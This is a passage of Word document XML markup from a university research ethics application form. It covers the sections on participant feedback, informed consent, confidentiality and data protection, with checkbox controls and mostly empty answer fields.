              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7401" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70095DDB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Does your research require you to hold a current DBS Certificate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="821" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="326282DC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-1418780434"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="084305C5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-2018915239"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E4113DC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-774482751"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E8CBE30" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68691060" w14:textId="669C4D01" w:rsidR="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION I: Feedback, Consent and Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15430126" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRPr="00E42F41" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1051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63E33" w:rsidRPr="00E42F41" w14:paraId="48E4E23C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="21A62405" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7DC091EE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Feedback</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FAB478D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">What de-briefing and feedback will be provided to participants, how will this be done and when? </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="54A76627" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FC7F4DC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05096654" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="44D957CE" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3506C481" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5FAD56A3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Informed consent</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E199E3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>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E42F41" w:rsidRPr="00E42F41" w14:paraId="076471B6" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="610A5878" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64F0DD3E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="4F06A8AD" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="336B12F5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DC3118E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Confidentiality / Anonymity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F85322E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Set out how anonymity of participants and confidentiality will be ensured in any outputs. If anonymity is not being offered, explain why this is the case. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E2CE07" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1DDB1430" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D81CF49" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07FA0694" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78A246A8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047D9757" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:lastRenderedPageBreak/>
        <w:t>SECTION J: Data Protection and Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123A544" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>In completing this section refer to the University’s Research Data Management Policy and the extensive resources on the University’s Research Data Management web pages (</w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidRPr="00E42F41">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>http://uwtsd.ac.uk/library/research-data-management/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E42F41">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10490" w:type="dxa"/>
        <w:tblInd w:w="-289"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42F41" w:rsidRPr="00E42F41" w14:paraId="68932BFA" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2F88188A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1322431F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Does the research activity involve personal da</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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2475BFB3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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5447FBC9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="405DCB88" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="710B0D7A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50110498" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">“Personal data” </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="333333"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
                <w:lang w:eastAsia="en-GB"/>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37EA1E0D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>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p w14:paraId="2B8FA29B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:id w:val="1521362940"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="17A9D4AB" w14:textId="77777777" w:rsidTr="00CA0B9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cPr>
          <w:p w14:paraId="6955F539" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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21AD7D3A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>If YES, provide a description of the data and explain why this data needs to be collected:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="50D85E0C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6950593E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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A7C9769" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28C96299" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="06AA9313" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="179CE3BB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78D92996" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
